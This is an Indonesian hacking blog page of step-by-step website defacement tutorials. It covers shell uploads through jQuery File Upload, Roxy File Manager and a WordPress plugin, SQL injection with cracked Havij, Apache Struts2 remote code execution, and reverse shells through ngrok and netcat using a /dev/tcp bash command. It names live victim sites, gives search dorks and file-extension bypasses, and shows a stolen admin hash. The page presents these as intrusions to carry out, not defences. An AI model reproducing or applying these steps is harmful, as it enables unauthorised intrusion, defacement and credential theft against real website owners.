Termux ID: Exploit/Vulnerabilities -->

    Social Items

Home / Exploit/Vulnerabilities

assalamualaikum wr.wb
sore yang cerah untuk bikin post :'v ,kali ini gua bakal share POC
Jquery File Upload :'v
menurut gue ini cara deface yang paling mudah
tapi kita harus pande pande bypass ext shell nya :'v
ok kita lanjut ke tutorial

Bahan Bahan

-Shell ext :php.fla / php56 /php6 /php2 /php1 /.ndsfx / dll
-dork : Touch Me 
csrf onlen : Mpssh
exploit : http://target.com/[path]/server/php/
 itu aja :'v

Tutorial 

 yang pertama adalah kita dorking bisa lewat google image ato google biasa
klo dorking pake google image ya tinggal pencet images :'v di bawah kolom pencarian
contoh w dorking di google image :
Google Image















ciri ciri vuln ? seperti ini :'v Forbidden ? tinggalkan sadja :'v














ok lanjut ekse go to csrf nya :) trus isi url target
trus post filenya files [] contoh punya saya :
selanjut nya pencet lock target :'v abis itu upload shell klean trus pencet upload gan :'v


selanjutnya kita diredirect ke web tersebut lalu mendapatkan pesan sbb :

nah klo seperti itu berarti shell kita ter upload sekarang kita akses dengan menambahkan /files/namashell
contoh : www.kontok.com/server/php/files/w.php.fla











mudah kan ? masih kurang faham ? tenang ada vidionya kok

jangan lupa ya dilike fp nya :)

sekian terima kasih






 


Cara Deface Jquery File Upload

kali ini gua mau share deface dengan sqli with Havij oke sebelumnya gua udah share tools havij ini
sekarang gua mau share cara makenya oke langsung aja

Bahan Bahan 

-Havij Crack nya (download disini gan)
-google dork : (download disini)
-Kesabaran :D

Tutorial 

kita Extrack Havij 1.16 dlu di tempat yang mudah dijangkau contoh Desktop
lalu klik kanan pada havij nya lalu Klik Run as admin












penampakan havij nya gini gan












oke selanjutnya kamu cari target dlu contoh saya ada live target
live : www.labooi.com/page.php?articles=17
exploit : site.com/contoh.php?id=69'
tambahin petik
oke Selanjutnya kita masukin ke havij nya tanpa tanda petik












lihat ss diatas, oke selanjut nya adalah kita klik analyze












kita tunggu ampe statusnya analyze ok selanjutnya adalah kita lihat tabel database nya
pencet tables












setelah itu klik get tables













ok selanjutnya adalah kita nyari column yang berhubungan dengan user admin pencet get columns
 contoh :
     user
     admin
     users
berhubung saya dapetnya web brazil so gue pilih table
engi_utillisateurs












terlihat banyak sangad datanya :'v selanjutnya kita centang apa saja yang digunakan untuk login lalu pencet get data
contoh
email , username , password ,id , dll *use your brain












tuh keliatan kan user dan pw admin
tapi klo masih bentuk md5 kita harus hash dlu
contoh di table password kek gini
fb889735bdeb0f8fc200aad392c6aafa745c9284
nah tinggal kita hash saja di hashkiller.co.uk
selanjutnya tinggal login deh
Add caption














tuh liat punya saya heheh masuk ke dashboard admin
btw klo mentok nyari admin loginnya make admin finder yang saya sudah share
upload shell ? use your brain :)
masih kurang paham ? nih vidionya

segitu aja dari gua :) jangan lupa like fp kami ya ^_^

Cara Deface Dengan SQLI (Havij)



yo :'v dah lama gk ngepos ea ainx gk ada imajinasi buat share tutor :'v
nyari exploit baru di exploit-db nemu juga okwowkowk
langsung aja

Bahan : 

dork : inurl:"/wp-content/plugins/wp-mobile-detector/"
          *kembangkan
bekas defacean kalian
oke langsung ke TKP

TKP

1. Dorking di google :'v pilih satu gan jangan semua :'v
2.nah klo sudah exploit dengan
wp-content/plugins/wp-mobile-detector/resize.php
contoh:http://site.com/wp-content/plugins/wp-mobile-detector/resize.php
3.abis itu kita anuin resize.php nya
contoh :http://site.com/wp-content/plugins/wp-mobile-detector/resize.php?src=site.com/deface.php
*site.com/deface.php nya ganti sama bekas defacean kalian
4.nah klo udah akses deh ^_^
akses ? http://site.com/wp-content/plugins/wp-mobile-detector/cache/shell.php

Demo

http://www.alrashidschool.com/ischool/wp-content/plugins/wp-mobile-detector/cache/h3.html
Kurang Paham ? vidio nya

Wordpress Plugins Mobile Detector Shell Upload

yu wazzap gaes >:( kali ini gue mao share cara deface dengan Roxy File Manager
yaudah berhubung udah malem yaudah deh langsung aja >:(

dork: intitle:"Roxy File Manager"
         inurl:fileman/uploads/
*kembangkan
ext shell : .php56 .php.fla, .php.xxx , .php5 .php6, .php.xxxjpg , .php.orion , .php.h3ll dll
pertama klean dorking di google :) trus cari target klean
nah abis itu exploit dengan
site.com/path/fileman/index.html <- kurang lebih seperti itu :'v
Live Target ainx : http://canhogiaresaigon.com.vn/quanly/fileman/index.html












abis itu upload shell kalean
Foto saat upload shell














nah klo kek gitu bisa gan sekarang tinggal akses deh
akses ? site.com/path/filemanager/Uploads/shell.php.fla












heheheheheheheheeh mudah kan ? Tinggal tebas aja tuh kwowkowkokwowkokw
oh iya jan lupa Like fp kita ya hehehehehe

Cara Deface Roxy File Manager

yup :'v kali ini gua mau share tools andalan gua klo maen sqli yaitu Havij :'v
ya sedikit penjelesan tentang havij ini
havij adalah sebuah alat untuk melakukan penetrasi terhadap wesite yang mempunyai vulnerability di
Sql Injection :'v













ini tools karena namanya crack jadi otomatis udah full fiture :'v 
ok deh langsung aja ke link donlodnya :'v 

Download Gan

Lapor Klo link rusak ok ;)

Download Havij 1.16 pro Portable Crack

 yo apa kabar klean hehehehe ;'v
disini w mao bagi bagi tutor neh backconnect di shell :'v
ok langsung aja
pertama kalian download ngrok sama netcatnya 
kucing warnetnya : disni
https://ngrok.com/ daftar trus download
klo udah daftar :''v tinggal login abis login kita dialihkan ke dasboard member
nah disini terlihat ada auth token kita copy auth tokennya trus paste ke ngrok 

FAC!














klo udah install auth token kita ketikkan 

ngrok.exe tcp 123         
FAC2














nah klo udah kayak gitu buka netcat nya
ketikkan nc -lnvp 123
FAC3












kita ke shell 













kurang lebih seperti ss :'v
isi servernya
0.tcp.ngrok.io portnya:random number
kan 0.tcp.ngrok.io:randomport

FAC4













sukses tinggal kau root 

Tutorial Back Connect without port forwading

Cara Deface Dengan Apache Sruts2 ( Remote Code Execution)

yo apa kabar gaes :''v gue admin baru nih hehehe kali ini gue bakal share tutor tentang 
Apache struts2 Remote Code Execution
sedikit info tentang Remote Code Execution ini Remote Code execution adalah sebuah vulnrability yang memungkinkan si attacker untuk memberikan code code berbahaya seperti namanya Remote Code kita bisa meremote kode kode tersebut lalu mengirimnya ke web target 
yodah gk usah banyak cocot lagi :'v 
Yup Langsung saja
Bahan : 
Dork : intitle:"Struts Problem Report" intext:"development mode is enabled."
Python <- disini gaes 
jexboss <- disini gaes 
netcat <-  disini gaes 

Langsung Ke tutor

1.Buka CMD lalu ke folder jexboss nya

2.yang ke dua ketikkan 
python jexboss.py -u http://targetklean.com 
klo vuln ada bacaan vulnerable trus ketik yes
3.sekarang kita coba reverse shell
Buka Netcat nya trus ketikkan
nc -lnvp 123















habis itu ke jexbossnya yang berhasil kita exploit
4.ketikkan /bin/bash -i > /dev/tcp/ip/port 0>&1 2>&1\n
note: klo port mu blom di forward coba pakai ngrok















Klo port blom di forward cek tutor disini gaes Tutorial back conect with Ngrok (disni)

Done udah kita berhasil reverse shell tinggal di anuin

Vidionya Gaes : disini gaes 

klo hoki sih bisa di root :''v

Tutorial Remote Code Exploit (Apache Struts2)

Tool Hacker Belt Pybelt

Tool Untuk Memudahkan Deface ,  Pybelt 

Jika kalian ingin melalukan peretasan mending gunakan Tools ini :) , mari kita Perkenalkan Tools Pybelt.
Pybelt adalah alat memudahkan peretas yang berbasis Python yang mampu memecahkan hash tanpa pengetahuan sebelumnya tentang algoritma, memindai port pada host tertentu, mencari kerentanan SQLi di URL yang diberikan, Mencari Website Dengan Google Dorks tanpa verikasi google, memverifikasi algoritme dari Hash yang diberikan, memindai URL untuk kerentanan XSS, dan menemukan proxy HTTP yang dapat digunakan.
Fitur - Fitur : 
  • Port Scanner
  • SQL Injection scanner
  • Dork Checker
  • Hash Cracker
  • Hash Type Verification
  • Proxy Finder
  • XSS Scanner
Untuk Melanjutkan Tahap Installan kalian install dahulu Python silahkan download di google ya :)
sekarang Download Dahulu Tool Nya :)


Ekstrak di Local disk C:\ biar mudah :) , dan ubah nama folder tersebut menjadi install ( bebas sih ganti nama aja biar mudah gw pake nama install ) lalu buka cmd dan ketik cd C:\install atau cd C:\ lalu cd install :)
Abis itu masukkan ini di cmd -> pip install -r requirements.txt
Lihat gambar biar ngerti ea 

SS1

Tunggu ampe selesai installan , jika selesai akan seperti ini :)

SS2

Selesai deh :) untuk gunakan Fitur lihat di bawah :
  • python pybelt.py -p 127.0.0.1 Scan Port pada host local
  • python pybelt.py -s http://example.com/php?id=2 Scan SQL 
  • python pybelt.py -d idea?id=55 Dork Scanner
  • python pybelt.py -c 9a8b1b7eee229046fc2701b228fc2aff:all Memecahkan hash menggunakan semua algoritma yang ada di komputer. 
  • python pybelt.py -v 098f6bcd4621d373cade4e832627b4f6 Mencari Verikasi Jenis HASH Seperti MD5
  • python pybelt.py -f Menemukan Proxy yang bisa di gunakan
  • python pybelt.py -x http://127.0.0.1/php?id=1 Mencari Isi Website untuk Kerengtanan XSS
Sekian dan Terimah kasih silahkan Like Fanspage kami biar makin Enjoy :) 

Tool Untuk Memudahkan Deface , Pybelt

Subscribe to: Posts (Atom)